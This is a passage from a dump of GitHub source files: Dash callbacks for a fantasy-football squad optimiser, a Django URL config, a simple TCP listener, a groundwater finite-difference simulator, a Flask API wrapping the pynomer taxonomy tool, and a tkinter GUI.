\"Fast Point\", \"Fast Potential\", \"Fast Return\", \"Cost\"]\n df_a = df_a[keep_cols].copy().T.reset_index()\n df_a.columns = [\"theta\", \"r\"]\n\n df_b = df_b[keep_cols].copy().T.reset_index()\n df_b.columns = [\"theta\", \"r\"]\n\n # pdb.set_trace()\n fig = go.Figure()\n fig.add_trace(go.Scatterpolar(r=df_a['r'].values, theta=df_a[\"theta\"].values,\n fill='toself', name=player_a))\n fig.add_trace(go.Scatterpolar(r=df_b['r'].values, theta=df_b[\"theta\"].values,\n fill='toself', name=player_b))\n fig.update_layout(polar=dict(radialaxis=dict(visible=False)), showlegend=True)\n # fig = px.line_polar(df_a, r='r', theta='theta', line_close=True)\n graph = dcc.Graph(figure=fig)\n return graph\n\n\n@app.callback([Output('squad-optim-output-play-xi', 'children'),\n 
Output('squad-optim-output-bench', 'children')],\n [Input('squad-optimization-btn', 'n_clicks')],\n [State('gw-selection-dropdown-squad', 'value'),\n State('model-selection-dropdown-optim', 'value'),\n State('formation-selection-dropdown-squad', 'value'),\n State('squad-value-input', 'value'),\n State('bench-value-input', 'value'),\n State('uncertain-flag', 'value')],\n prevent_initial_call=True)\ndef execute_squad_optimization(n_clicks, gw_id, model_name, formation, squad_val, bench_val, uncertain_flag):\n if not gw_id:\n msg = html.P(\"Please select GW for scoring\")\n return msg, msg\n\n if not model_name:\n msg = html.P(\"Please select Model\")\n return msg, msg\n\n if not formation:\n msg = html.P(\"Please select Formation\")\n return msg, msg\n\n if not squad_val:\n msg = html.P(\"Please select Squad Value\")\n return msg, msg\n\n if not bench_val:\n msg = html.P(\"Please select Bench Value\")\n return msg, msg\n\n if not uncertain_flag:\n msg = html.P(\"Please select Uncertain Flag\")\n return msg, msg\n df_leads = load_leads(gw_id)\n # pdb.set_trace()\n df_leads[\"name\"] = df_leads[\"name\"].apply(lambda x: str(x).encode('ascii', 'ignore'))\n print(df_leads.head())\n if n_clicks:\n df_squad_xi, sol_info_xi = squad_optimizer(df_leads, formation=formation,\n budget=squad_val - bench_val, optimise_on=model_name)\n xi_players = [int(i) for i in formation.split('-')]\n bench_players = [str(2 - xi_players[0]), str(5 - xi_players[1]), str(5 - xi_players[2]), str(3 - xi_players[3])]\n bench_formation = \"-\".join(bench_players)\n xi_names = df_squad_xi[\"name\"].unique().tolist()\n df_leads = df_leads[~df_leads[\"name\"].isin(xi_names)].copy()\n df_squad_bench, sol_info_bench = squad_optimizer(df_leads, formation=bench_formation,\n budget=bench_val, optimise_on=model_name)\n\n df_squad_xi[\"name\"] = df_squad_xi[\"name\"].apply(lambda x: x.decode('utf-8'))\n df_squad_bench[\"name\"] = df_squad_bench[\"name\"].apply(lambda x: x.decode('utf-8'))\n # df_squad = df_squad[[\"position\", \"cost\", \"points\"]].copy()\n df_squad_xi[\"points\"] = df_squad_xi[\"points\"].round(2)\n df_squad_bench[\"points\"] = df_squad_bench[\"points\"].round(2)\n col_map = {\"name\": \"Player\", \"team\": \"Team\", \"cost\": \"Cost\", \"position\": \"Position\", \"points\": model_name}\n df_squad_xi = df_squad_xi.rename(columns=col_map)\n df_squad_bench = df_squad_bench.rename(columns=col_map)\n position_map = {'GK': 1, 'DEF': 2, 'MID': 3, 'FWD': 4}\n\n df_squad_xi[\"pos_map\"] = df_squad_xi[\"Position\"].apply(lambda x: position_map[x])\n df_squad_bench[\"pos_map\"] = df_squad_bench[\"Position\"].apply(lambda x: position_map[x])\n df_squad_xi = df_squad_xi.sort_values(by=[\"pos_map\"])\n df_squad_bench = df_squad_bench.sort_values(by=[\"pos_map\"])\n df_squad_xi = df_squad_xi.drop(columns=[\"pos_map\"])\n df_squad_bench = df_squad_bench.drop(columns=[\"pos_map\"])\n table_xi, table_bench = make_table(df_squad_xi, page_size=11), make_table(df_squad_bench)\n\n return table_xi, table_bench\n else:\n return html.P(\"Button Not Clicked!\")\n\n\n@app.callback(Output('transfer-suggestion-output', 'children'),\n [Input('transfer-optimization-btn', 'n_clicks')],\n [State('manager-selection-transfers', 'value'),\n State('transfer-selection-numbers', 'value'),\n State('gw-selection-dropdown-squad', 'value'),\n State('model-selection-dropdown-optim', 'value')],\n prevent_initial_call=True)\ndef execute_transfer_suggestions(n_clicks, manager_id, num_transfers, gw_id, model_name):\n if not manager_id:\n msg = html.P(\"Please 
select manager...\")\n return msg\n if not num_transfers:\n msg = html.P(\"Please select number of transfer to be made...\")\n return msg\n if not gw_id:\n msg = html.P(\"Please select GW for scoring...\")\n return msg\n if not model_name:\n msg = html.P(\"Please select ML Model...\")\n return msg\n\n if n_clicks:\n tables = []\n n_suggestions = 5\n df_leads = load_leads(gw_id)\n\n for i in range(n_suggestions):\n try:\n df_transfer = transfer_optimizer(df_leads, manager_id, num_transfers, model_name)\n tables.append(make_table(df_transfer))\n exclude_names = df_transfer[\"Transfer In\"].unique().tolist()\n df_leads = df_leads[~df_leads[\"name\"].isin(exclude_names)].copy()\n except:\n pass\n\n output = html.Div(\n children= tables\n )\n\n return output\n\n return html.P(\"Button Not Clicked!\")\n","repo_name":"rbiswasfc/fpl-portal","sub_path":"callbacks/callback_squad.py","file_name":"callback_squad.py","file_ext":"py","file_size_in_byte":19779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"15403946953","text":"from django.conf.urls import url, include, re_path\nfrom ajax_select import urls as ajax_select_urls\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import RedirectView\n\nfrom . import views\nfrom .views import IndexView, RowerList, RowerDetail, RaceList, RaceDetail, RankingView, AboutView, ClubList, ClubDetail, RowerSearch, CompetitionView, CompetitionResults, RowerCompare, Compare, IndexView2, KnockoutView, WeatherCalc\nurlpatterns = [\n\t#re_path(r'^$', views.current_datetime, name='index'),\n\t#re_path(r'^recalculate/$', views.CalculateView),\n\t#re_path(r'^$', views.IndexView.as_view(), name='index'),\n\tre_path(r'^$', views.IndexView2, name='index'),\n\tre_path(r'^about/$', views.AboutView.as_view(), name='about'),\n\tre_path(r'^rowers/$', RowerList.as_view(), name=\"rower-list\"),\n\tre_path(r'^rowers/(?P[0-9]+)/$', views.RowerDetail, name=\"rower-detail\"),\n\tre_path(r'^races/$', RaceList.as_view(), name=\"race-list\"),\n\tre_path(r'^races/(?P[0-9]+)/$', views.RaceDetail, name=\"race-detail\"),\n\tre_path(r'^rankings/$', views.RankingView, name=\"ranking\"),\n\tre_path(r'^competition/$', views.CompetitionView, name=\"comp-list\"),\n\tre_path(r'^competition/(?P[0-9]+)/$', views.CompetitionResults, name=\"comp-detail\"),\n\tre_path(r'^clubs/$', ClubList.as_view(), name=\"club-list\"),\n\tre_path(r'^clubs/(?P[0-9]+)/$', views.ClubDetail, name=\"club-detail\"),\n\t#re_path(r'^compare/$', csrf_exempt(views.Compare), name=\"compare-index\"),\n\tre_path(r'^compare/$', views.RowerCompare2, name=\"compare2\"),\n\tre_path(r'^crewcompare/$', views.CrewCompare, name=\"crewcompare\"),\n\tre_path(r'^rowing/hrr/(?P[0-9]+)/$', views.KnockoutView, name=\"knockouts\"),\n\tre_path(r'^favicon\\.ico$',RedirectView.as_view(url='/static/favicon.ico')),\n re_path(r'^weather/$', views.WeatherCalc, name=\"weather\"),\n\t#re_path(r'^compare/(?P[0-9]+)/(?P[0-9]+)/$', views.RowerCompare, name=\"compare\"),\n\t#re_path(r'^rower-autocomplete/$', RowerAutocomplete.as_view(), name=\"rower-autocomplete\"),\n\t#re_path(r'rowerm2m/$', CrewUpdate.as_view(), name=\"crew-update\"),\n\n\t# used in the search function on the rowers view\n\tre_path(r'^rowersearch/$', views.RowerSearch, name=\"rower-search\"),\n\t\n\t# used in autoselect in admin\n\tre_path(r'^ajax_select/', include(ajax_select_urls)),\n]","repo_name":"charlesbarry/rowingstats","sub_path":"rowing/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"29356506297","text":"import socket\nimport threading\nimport signal\nimport sys\n\n# Define the IP address and port to listen on\nIP = '0.0.0.0' # Listen on all available network interfaces\nPORT = 1234 # Port number to listen on\n\n# Global variable to track whether the server should continue running\nserver_running = True\n\n# Function to handle incoming client connections\ndef handle_client(client_socket):\n with client_socket as sock:\n # Receive data from the client (up to 1024 bytes)\n request = sock.recv(1024)\n print(f'[*] Received: {request.decode(\"utf-8\")}')\n \n # Send a simple acknowledgment back to the client\n sock.send(b'ACK')\n\n# Signal handler for ctrl+c\ndef signal_handler(sig, frame):\n global server_running\n print(\"[*] Exiting server...\")\n server_running = False\n sys.exit(0)\n\n# Main function to set up the server\ndef main():\n # Register the signal handler for ctrl+c\n signal.signal(signal.SIGINT, signal_handler)\n \n # Create a socket object using IPv4 and TCP\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Bind the socket to the IP and port\n server.bind((IP, PORT))\n\n # Listen for incoming connections, allowing up to 5 queued connections\n server.listen(5)\n print(f'[*] Listening on {IP}:{PORT}')\n\n while server_running:\n try:\n # Accept an incoming connection, client is a new socket object\n # and address is the client's address (IP and port)\n client, address = server.accept()\n print(f'[*] Accepted connection from {address[0]}:{address[1]}')\n\n # Create a new thread to handle the client's communication\n client_handler = threading.Thread(target=handle_client, args=(client,))\n client_handler.start()\n except KeyboardInterrupt:\n # If ctrl+c is pressed during server operation, terminate gracefully\n print(\"[*] Server interrupted by user.\")\n server.close()\n sys.exit(0)\n\nif __name__ == '__main__':\n main()\n","repo_name":"CaptLevi0408/Black-Hat-Python","sub_path":"Basic Networking Tools/tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"931098669","text":"# 地下水流随机方程的数值模拟求解尝试\nimport random\nfrom scipy.fftpack import fft, ifft\n\nimport numpy as np\nfrom numpy import sin, cos, tan\nimport numpy.linalg as nla\nfrom sympy import symbols\nimport sympy as sy\nimport matplotlib\n\nmatplotlib.use('QtAgg')\nimport matplotlib.pyplot as plt\n\n\nclass Random_flow:\n def __init__(self):\n self.ic = None\n self.tl = None\n self.st = None\n self.name_chinese = \"非稳定随机一维流\"\n self.xl = None\n self.sl = None\n self.h_r = []\n self.h_l = []\n self.B = 1 # 默认一维流的宽度为1个单位\n\n def l_boundary(self, h_l, Dirichlet=False, Neumann=False, Robin=False): # 左边界\n if Dirichlet:\n self.h_l = [1, float(h_l)]\n elif Neumann:\n self.h_l = [2, float(h_l)]\n\n def r_boundary(self, h_r, Dirichlet=False, Neumann=False, Robin=False): # 右边界\n if Dirichlet:\n self.h_r = [1, float(h_r)]\n elif Neumann:\n self.h_r = [2, float(h_r)]\n\n def step_length(self, sl): # X轴差分步长\n self.sl = float(sl)\n\n def step_time(self, st): # 时间轴差分步长\n self.st = float(st)\n\n def x_length(self, xl): # X轴轴长\n self.xl = float(xl)\n\n def t_length(self, tl): # 时间轴轴长,原则上单位为天\n self.tl = float(tl)\n\n def initial_condition(self, ic: str): # 初始条件的水头设定\n self.ic = str(ic)\n\n def width(self, B): # 含水层宽度的设定\n self.B = float(B)\n\n def draw(self, H_ALL: np.ndarray, time=0, title=''): # 按给定的时刻绘制水头曲线\n # X轴单元格的数目\n m = int(self.xl / self.sl) + 1\n # X轴\n X = np.linspace(0, self.xl, m)\n # 可以plt绘图过程中中文无法显示的问题\n plt.rcParams['font.sans-serif'] = ['SimHei']\n # 解决负号为方块的问题\n plt.rcParams['axes.unicode_minus'] = False\n fig = plt.figure(figsize=(10, 7))\n ax = fig.add_subplot()\n ax.plot(X, H_ALL[time], linewidth=1, antialiased=True)\n\n def maxH_y(h_all):\n hy = 0\n for i in h_all:\n if i > hy:\n hy = i\n return hy\n\n def minH_y(h_all):\n hy = 0\n for i in h_all:\n if i < hy:\n hy = i\n return hy\n\n ax.set_ylim(minH_y(H_ALL[time]), maxH_y(H_ALL[time]))\n ax.set(ylabel='水头(m)', xlabel='X轴(m)')\n plt.suptitle(self.name_chinese)\n if title == '':\n plt.title(\"差分数值解,当前为第{0}时刻(差分空间步长{1},时间步长{2})\".format(time, self.sl, self.st))\n else:\n plt.title(title)\n plt.show()\n\n def draw_location(self, H_ALL: np.ndarray, location=0, title=''): # 按给定的时刻绘制水头曲线\n # T轴单元格的数目\n m = int(self.tl / self.st) + 1\n # T轴\n T = np.linspace(0, self.tl, m)\n # 水头轴\n H = []\n for i in H_ALL:\n H.append(i[location])\n # 可以plt绘图过程中中文无法显示的问题\n plt.rcParams['font.sans-serif'] = ['SimHei']\n # 解决负号为方块的问题\n plt.rcParams['axes.unicode_minus'] = False\n fig = plt.figure(figsize=(10, 7))\n ax = fig.add_subplot()\n ax.plot(T, H, linewidth=1, antialiased=True)\n ax.set_ylim(min(H) - 1, max(H) + 1)\n ax.set(ylabel='水头(m)', xlabel='时间轴(d)')\n plt.suptitle(self.name_chinese)\n if title == '':\n plt.title(\"差分数值解,当前为第{0}位置(差分空间步长{1},时间步长{2})\".format(location, self.sl, self.st))\n else:\n plt.title(title)\n plt.show()\n\n def draw_surface(self, H_ALL: np.ndarray, title=''): # 绘制表面图\n # X轴单元格的数目\n m = int(self.xl / self.sl) + 1\n # 时间轴单元格数目\n n = int(self.tl / self.st) + 1\n # X轴\n X = np.linspace(0, self.xl, m)\n # 时间轴\n T = np.linspace(0, self.tl, n)\n # 定义初值\n X, T = np.meshgrid(X, T)\n # 可以plt绘图过程中中文无法显示的问题\n plt.rcParams['font.sans-serif'] = ['SimHei']\n # 解决负号为方块的问题\n plt.rcParams['axes.unicode_minus'] = False\n fig = plt.figure(figsize=(10, 7))\n ax = fig.add_subplot(projection='3d')\n\n def maxH_z(h_all):\n hz = 0\n for i in h_all:\n for j in i:\n if j > hz:\n hz = j\n return hz\n\n def minH_z(h_all):\n hz = 0\n for i in h_all:\n for j in i:\n if j < hz:\n hz = j\n return hz\n\n ax.set_zlim(minH_z(H_ALL), 
maxH_z(H_ALL))\n ax.plot_surface(X, T, H_ALL, linewidth=0, antialiased=True, cmap=plt.get_cmap('rainbow'))\n ax.set(zlabel='水头(m)', ylabel='时间轴(d)', xlabel='X轴(m)')\n plt.suptitle(self.name_chinese)\n if title == '':\n plt.title(\"差分数值解(差分空间步长{0},时间步长{1})\".format(self.sl, self.st))\n else:\n plt.title(title)\n plt.show()\n\n\nclass Random_one_dimension_boussinesq(Random_flow):\n def __init__(self):\n super().__init__()\n self.we = None\n self.Sy = None\n self.K = None\n self.w = None\n self.a = None\n self.a_as = None\n self.ha = None\n self.name_chinese = '潜水含水层随机非稳定一维流'\n\n def reference_thickness(self, ha): # 潜水含水层的参考厚度,解析解求解中使用参考厚度法线性化偏微分方程\n self.ha = float(ha)\n\n def pressure_diffusion_coefficient(self, a): # 潜水含水层压力扩散系数的设定。等于渗透系数乘初始水头常数除给水度Kh0/Sy\n self.a = float(a)\n\n def source_sink_expectation(self, we): # 源汇项期望值的设定\n self.we = float(we)\n\n def source_sink_term(self, w: str): # 潜水含水层源汇项的设定,可以为一个常数也可以为函数,如sin(x) + cos(t)\n self.w = w\n\n def fft_source_sink_term(self): # 对源汇项做快速傅里叶变换\n # 时间轴单元格数目\n n = int(self.tl / self.st) + 1\n # 时间轴\n t = np.linspace(0, self.tl, n)\n fft_w = fft(eval(self.w))\n return fft_w\n\n @staticmethod\n def fft_location(H_ALL: np.ndarray, location=0): # 对一个位置的不同时刻水头做快速傅里叶变换\n # 同一位置不同时刻的离散水头\n H = []\n for i in H_ALL:\n H.append(i[location])\n fft_H = fft(H)\n return fft_H\n\n def hydraulic_conductivity(self, K): # 潜水含水层渗透系数的设定\n self.K = float(K)\n\n def specific_yield(self, Sy): # 潜水含水层储水系数(重力给水度)的设定\n self.Sy = float(Sy)\n\n def random_w(self):\n # 随机振幅生成\n amplitude = random.uniform(0, self.we)\n # 随机周期生成\n while True:\n cycle = self.tl / int(random.uniform(1, 50)) # 依据香农采样定理采样频率必须大于信号频率的两倍\n if cycle >= 3 * self.st: # 所以信号周期的随机生成必须大于采样周期的两倍,本程序取三倍\n break\n # 随机频率\n frequency = 1 / cycle\n return amplitude, cycle, frequency\n\n def solve(self):\n # 如果未设定压力扩散系数\n if self.a is None or self.a == \"\":\n self.a = self.K / self.Sy\n # 对于潜水含水层一维非稳定流,定义两个参数 x t\n x = symbols(\"x\")\n t = symbols(\"t\")\n # X轴差分点的数目\n m = int(self.xl / self.sl) + 1\n # 时间轴差分点的数目\n n = int(self.tl / self.st) + 1\n\n # 对函数W(x, t)定义为源汇项函数除以渗透系数K\n def W(x, t):\n return eval(self.w) / self.K\n\n # 函数IC定义为初始水头分布曲线\n def IC(x):\n return eval(self.ic)\n\n # 创建一个全部值为0的矩阵,用于存放各个差分位置的水头值\n H_ALL = np.zeros((n, m))\n # 常数b矩阵\n H_b = np.zeros((m * n, 1))\n # 系数a矩阵\n H_a = np.zeros((m * n, m * n))\n # 定义系数a矩阵的行数\n\n # 矩阵赋值\n for k in range(0, n): # 对行(时间轴)进行扫描\n iteration_times = 0 # 迭代运算次数计数\n H_previous_iteration = np.zeros((1, m))\n # 迭代运算开始\n while True:\n H_a = np.zeros((m, m))\n l_a = 0\n H_b = np.zeros((m, 1))\n\n if iteration_times == 0 and k != 0:\n H_previous_iteration = H_ALL[k - 1] # 前次迭代的当前时刻水头数值,此处未开始计算,使用上一时刻的水头值进行近似\n\n for i in range(0, m): # 对列(X轴)进行扫描\n # 时间边界赋值(初始条件)\n if k == 0:\n H_a[l_a, l_a] = 1\n H_b[l_a] = IC(i * self.sl)\n\n # 左边界赋值\n elif (i - 1) < 0 and self.h_l[0] == 1: # 一类边界判断\n H_a[l_a, l_a] = 1\n H_b[l_a] = self.h_l[1]\n elif (i - 1) < 0 and self.h_l[0] == 2: # 二类边界判断\n # 源汇项赋值\n H_b[l_a] = - W(i * self.sl, k * self.st) - self.Sy / (self.K * self.st) * H_ALL[\n k - 1, i] - 2 * self.sl * self.h_l[1] * (\n H_previous_iteration[i] + self.h_l[1] * 0.5 * self.sl) / (\n self.sl * self.sl)\n # 给位置为(i, k)处的水头赋上系数值\n H_a[l_a, l_a] = -(H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n 2 * self.sl * self.sl) - (H_previous_iteration[i] + self.h_l[1] * 0.5 * self.sl) / (\n self.sl * self.sl) - self.Sy / (self.K * self.st)\n # 给位置为(i+1, k)处的水头赋上系数值\n H_a[l_a, l_a + 1] = (H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n 2 * self.sl * 
self.sl) + (H_previous_iteration[i] + self.h_l[1] * 0.5 * self.sl) / (\n self.sl * self.sl)\n\n # 右边界赋值\n elif (i + 1) == m and self.h_r[0] == 1:\n H_a[l_a, l_a] = 1\n H_b[l_a] = self.h_r[1]\n elif (i + 1) == m and self.h_r[0] == 2:\n # 源汇项赋值\n H_b[l_a] = - W(i * self.sl, k * self.st) - self.Sy / (self.K * self.st) * H_ALL[\n k - 1, i] + 2 * self.sl * self.h_r[1] * (\n H_previous_iteration[i] + self.h_r[1] * 0.5 * self.sl) / (\n self.sl * self.sl)\n # 给位置为(i, k)处的水头赋上系数值\n H_a[l_a, l_a] = - (H_previous_iteration[i] + self.h_r[1] * 0.5 * self.sl) / (\n self.sl * self.sl) - (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n 2 * self.sl * self.sl) - self.Sy / (self.K * self.st)\n # 给位置为(i-1, k)处的水头赋上系数值\n H_a[l_a, l_a - 1] = (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n 2 * self.sl * self.sl) + (H_previous_iteration[i] + self.h_r[1] * 0.5 * self.sl) / (\n self.sl * self.sl)\n else: # 非边界部分赋值\n # 源汇项赋值\n H_b[l_a] = - W(i * self.sl, k * self.st) - self.Sy / (self.K * self.st) * H_ALL[\n k - 1, i]\n # 给位置为(i, k)处的水头赋上系数值\n H_a[l_a, l_a] = -(H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n 2 * self.sl * self.sl) - (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n 2 * self.sl * self.sl) - self.Sy / (self.K * self.st)\n # 给位置为(i-1,k)处的水头赋上系数值\n H_a[l_a, l_a - 1] = (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n 2 * self.sl * self.sl)\n # 给位置为(i+1, k)处的水头赋上系数值\n H_a[l_a, l_a + 1] = (H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n 2 * self.sl * self.sl)\n l_a += 1\n\n H = nla.solve(H_a, H_b) # 进行当前时刻的水头计算结果\n if k == 0: # 第零时刻不参与迭代计算\n break\n\n # 判断是否满足精度需求\n precision = 0\n for u in range(0, m):\n if abs(H_previous_iteration[u] - H[u]) > 0.01:\n precision = 1\n if precision != 1:\n break\n else:\n iteration_times += 1\n H_previous_iteration = H\n\n if iteration_times > 100:\n break\n for o in range(0, m): # 对空间进行扫描,整合成所有适合的计算水头\n H_ALL[k, o] = H[o]\n return H_ALL\n\n\nif __name__ == \"__main__\":\n flow = Random_one_dimension_boussinesq()\n flow.sl = 10\n flow.st = 5\n flow.ic = '60 + x * np.tan(3.1415/120) + 5 * np.sin(x/60)'\n flow.tl = 365\n flow.xl = 2000\n flow.h_r = [2, 0]\n flow.h_l = [1, 60]\n flow.Sy = 0.08\n flow.K = 10\n flow.we = 0.4\n # flow.w = '0'\n flow.w = '0.4/36 + 0.1/36 * sin(3.1415*t/200) + 0.05/36 * sin(3.1415*t/10)'\n d = flow.fft_source_sink_term()\n h = flow.solve()\n # flow.draw(H_ALL=h, time=0)\n a, b, c = flow.random_w()\n # print(a)\n # print(b)\n # print(c)\n\n print(len(d))\n\n flow.draw_surface(H_ALL=h)\n","repo_name":"YuLei-1005203115/FDM_groundwater","sub_path":"FDMgroundwater/randomflow.py","file_name":"randomflow.py","file_ext":"py","file_size_in_byte":14769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"40409864086","text":"from flask import Flask, jsonify, make_response, url_for, request\nimport pynomer\nfrom datetime import datetime\nimport logging\nimport sys\nimport os\n\napp = Flask(__name__)\n\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setFormatter(\n logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n)\napp.logger.addHandler(handler)\napp.logger.setLevel(logging.DEBUG)\n\n\n# @app.before_first_request\n# def load_cache():\n# app.logger.info(\"Clean taxon cache\")\n# run_nomer(nomer_cmd=get_nomer_simple_cmd(cmd=\"clean\"))\n# app.logger.info(\"Load taxon cache\")\n# run_nomer(get_nomer_match_cmd(cmd=\"append\", id=\"GBIF:1\"))\n# app.logger.info(\"Ready to start server\")\n\n\n@app.route(\"/\")\ndef index():\n return \"\"\"\n Nomer in Docker! \n A web-app for running Nomer inside Docker.
\n \"\"\"\n\n\n@app.route(\"/version\", methods=[\"GET\"])\ndef version():\n \"\"\"\n Show Version.\n \"\"\"\n cmd, result = pynomer.version()\n return get_response(cmd, result)\n\n\n@app.route(\"/clean\", methods=[\"GET\"])\ndef clean():\n \"\"\"\n Cleans term matcher cache.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.clean(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/matchers\", methods=[\"GET\"])\ndef matchers():\n \"\"\"\n Lists supported matcher and (optionally) their descriptions.\n :param o: [\"tsv\", \"json\"] Output format. Default: \"tsv\"\n :param v: [bool] If set, matcher descriptions are included for tsv. Default: False\n \"\"\"\n o = request.args.get(\"o\", \"tsv\")\n v = request.args.get(\"v\", \"\")\n\n cmd, result = pynomer.matchers(output_format=o, verbose=v)\n return get_response(cmd, result)\n\n\n@app.route(\"/replace\", methods=[\"GET\"])\ndef replace():\n \"\"\"\n Replace exact term matches in row. The input schema is used\n to select the id and/or name to match to. The output schema is\n used to select the columns to write into.\n :param query: [string] Query. Default: \n :param matcher: [string] Selected matcher. Default: \"globi-taxon-cache\"\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n\n query = request.args.get(\"query\", \"\")\n matcher = request.args.get(\"matcher\", \"globi-taxon-cache\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n e = False\n\n cmd, result = pynomer.replace(\n query=query, matcher=matcher, properties=p, echo_opt=\"-e\" if e else \"\"\n )\n return get_response(cmd, result)\n\n\n@app.route(\"/append\", methods=[\"GET\"])\ndef append():\n \"\"\"\n Append term match to row using id and name columns specified\n in input schema. Multiple matches result in multiple rows.\n :param query: [string] Query. Default: \n :param matcher: [string] Selected matcher. Default: \"globi-taxon-cache\"\n :param p: [string] Path to properties file to override defaults. Default: None\n :param o: [\"tsv\", \"json\"] Output format. Default: \"tsv\"\n \"\"\"\n query = request.args.get(\"query\", \"\")\n matcher = request.args.get(\"matcher\", \"globi-taxon-cache\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n o = request.args.get(\"o\", \"tsv\")\n e = False\n\n cmd, result = pynomer.append(\n query=query,\n matcher=matcher,\n properties=p,\n output_format=o,\n echo_opt=\"-e\" if e else \"\",\n )\n return get_response(cmd, result)\n\n\n@app.route(\"/input_schema\", methods=[\"GET\"])\ndef input_schema():\n \"\"\"\n Show input schema in JSON.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.input_schema(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/output_schema\", methods=[\"GET\"])\ndef output_schema():\n \"\"\"\n Show output schema.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.output_schema(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/properties\", methods=[\"GET\"])\ndef properties():\n \"\"\"\n Lists configuration properties. 
Can be used to make a local copy and override\n default settings.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.properties(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/validate_term\", methods=[\"GET\"])\ndef validate_term():\n \"\"\"\n Validate terms.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n filepath = request.args.get(\"filepath\", \"\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.validate_term(filepath, properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/validate_term_link\", methods=[\"GET\"])\ndef validate_term_link():\n \"\"\"\n Validate term links.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n filepath = request.args.get(\"filepath\", \"\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.validate_term_link(filepath, properties=p)\n return get_response(cmd, result)\n\n\ndef get_response(cmd, cmd_result):\n headers = {}\n return make_response(\n jsonify(\n {\n \"command\": cmd,\n \"result\": cmd_result,\n \"tstamp\": datetime.utcnow().timestamp(),\n \"endpoints\": {\"url_index\": url_for(\"index\", _external=True)},\n }\n ),\n 200,\n headers,\n )\n\n\ndef get_properties(p):\n p = p if p != \"None\" else None\n if p:\n path = os.path.join(os.getcwd(), \"input_properties\")\n with open(path, \"w\") as f:\n app.logger.debug(f\"Create new file {path} with content {p}\")\n f.write(p)\n return path\n return p\n\n\nif __name__ == \"__main__\":\n pynomer.append(query=\"\\tHomo sapiens\", matcher=\"globi-taxon-cache\")\n app.run(debug=True, host=\"0.0.0.0\", port=\"9090\", threaded=True)\n","repo_name":"nleguillarme/pynomer","sub_path":"pynomer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"15966780973","text":"import tkinter as tk\nfrom tkinter import ttk\n\nfrom GUI_lent import Window as Lent\nfrom GUI_media import Window as Media\n\nclass App(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n self.title(\"Barbara\")\n self.geometry('800x650')\n self.resizable(False, False)\n\n self.tabControl = ttk.Notebook(self)\n self.tab1 = ttk.Frame(self.tabControl)\n self.tab2 = ttk.Frame(self.tabControl)\n\n self.tabControl.add(self.tab1, text='lent')\n self.tabControl.add(self.tab2, text='media')\n self.tabControl.pack(expand=1, fill=\"both\")\n\n self.lent = Lent(self.tab1)\n self.media = Media(self.tab2)\n\n self.lent.pack(fill='x', anchor='s')\n self.media.pack()\n\n\nif __name__=='__main__':\n barbara = App()\n barbara.mainloop()\n","repo_name":"AkitoKay/Barbara","sub_path":"Code/GUI_main.py","file_name":"GUI_main.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"}
